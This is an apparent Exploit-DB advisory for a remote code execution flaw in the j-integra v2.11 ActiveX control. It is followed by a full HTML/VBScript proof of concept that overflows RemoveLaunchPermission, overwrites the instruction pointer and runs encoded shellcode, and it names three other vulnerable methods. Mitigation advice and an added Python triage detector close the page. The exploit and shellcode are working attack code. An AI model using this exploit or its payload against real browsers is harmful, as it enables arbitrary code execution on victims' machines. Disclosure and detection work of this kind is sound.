vendor: j-integra
by: bz1p
CVSS: 3.3 (LOW)
CWE: Remote code execution
Product Name: j-integra
Affected Version From: v2.11
Affected Version To: v2.11
Patch Exists: YES
Related CWE: ? (0day)
CPE:
Metasploit:
Other Scripts:
Platforms Tested: XP SP3 IE7
Year: 2010

j-integra v2.11 Remote code execution vulnerability

j-integra v2.11 contains a remote code execution vulnerability in the ActiveX object with classid 'clsid:F21507A7-530F-4A89-8FE4-9D989670FD2C'. In the PoC below, an overlong first argument to the object's RemoveLaunchPermission method gives the caller control of the instruction pointer (the value the PoC labels eip), which leads to arbitrary code execution. The exploit has been tested on XP SP3 IE7. The impact is considered low because the object is not marked safe for scripting. The vulnerability was silently patched by the developers in version v2.12.

Mitigation:

Upgrade to version v2.12 or later to mitigate this vulnerability.

Exploit-DB raw data:

<html>
<!-- 
j-integra v2.11 Remote code execution vulnerability
Discovered on: Thursday, October 28, 2010, 10:10:12 PM
Download: http://j-integra.intrinsyc.com/
Author: bz1p, bz1p@bshellz.net
impact: LOW, due to the object NOT marked safe for scripting
Tested on: XP SP3 IE7
CVE: ? (0day)

NOTE:
This vuln was silently patched by the developers (v2.12), hence I am providing 
this PoC. They did not change the versions for DCOMConfig.dll, so I can only
conclude that they are sneaky and should be slapped for backdooring 
software and making customers pay mula.
-->

<object classid='clsid:F21507A7-530F-4A89-8FE4-9D989670FD2C' id='target' ></object>
<script language='vbscript'>
esp = String(100, "B")

calc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
unescape("%50%68")

eip = unescape("%2f%55%02%10") ' CALL EDI
arg1=String(253, "A")
arg1 = arg1 + eip + esp + calc
arg2="defaultV"

target.RemoveLaunchPermission arg1 ,arg2
</script>
</html>

<!--
It has also been reported by Dr_IDE that the following methods 
are also vulnerable to the same exploit:
target.RemoveAccessPermission arg1 ,arg2
target.AddLaunchPermission arg1 ,arg2
target.AddAccessPermission arg1 ,arg2
-->
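For triage of proxy or mail-gateway captures, the following added example (not part of the original PoC or of j-integra) flags HTML that instantiates the CLSID above and calls any of the four methods named on this page. The names `ObjectFinder`, `scan` and `SAMPLE` are hypothetical, and the sample input is constructed and carries no payload.

```python
import re
from html.parser import HTMLParser

# Identifiers taken from the PoC on this page.
CLSID = "f21507a7-530f-4a89-8fe4-9d989670fd2c"
METHODS = ("RemoveLaunchPermission", "RemoveAccessPermission",
           "AddLaunchPermission", "AddAccessPermission")
CANON = {m.lower(): m for m in METHODS}

class ObjectFinder(HTMLParser):
    """Collect ids of <object> tags bound to CLSID, plus all script text."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and a.get("classid", "").strip().lower() == "clsid:" + CLSID:
            self.ids.append(a.get("id", ""))
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def scan(html):
    """Report whether html loads the control and which listed methods it calls."""
    p = ObjectFinder()
    p.feed(html)
    p.close()
    script, calls = "\n".join(p.scripts), set()
    for obj_id in filter(None, p.ids):
        # VBScript is case-insensitive, so match names without regard to case.
        pat = re.compile(r"\b%s\s*\.\s*(%s)\b" % (re.escape(obj_id), "|".join(METHODS)), re.I)
        calls.update(CANON[m.lower()] for m in pat.findall(script))
    return {"loads_control": bool(p.ids), "method_calls": sorted(calls)}

# Constructed, benign sample: short arguments, no payload.
SAMPLE = """<html><object classid='CLSID:F21507A7-530F-4A89-8FE4-9D989670FD2C' id='target'></object>
<script language='vbscript'>
target.removelaunchpermission "user", "defaultV"
target.AddAccessPermission "user", "defaultV"
</script></html>"""
if __name__ == "__main__":
    print(scan(SAMPLE))
```

A hit on `loads_control` alone is worth reviewing on hosts still running v2.11; static matching only sees markup present in the captured body, so treat the result as a triage signal rather than a verdict.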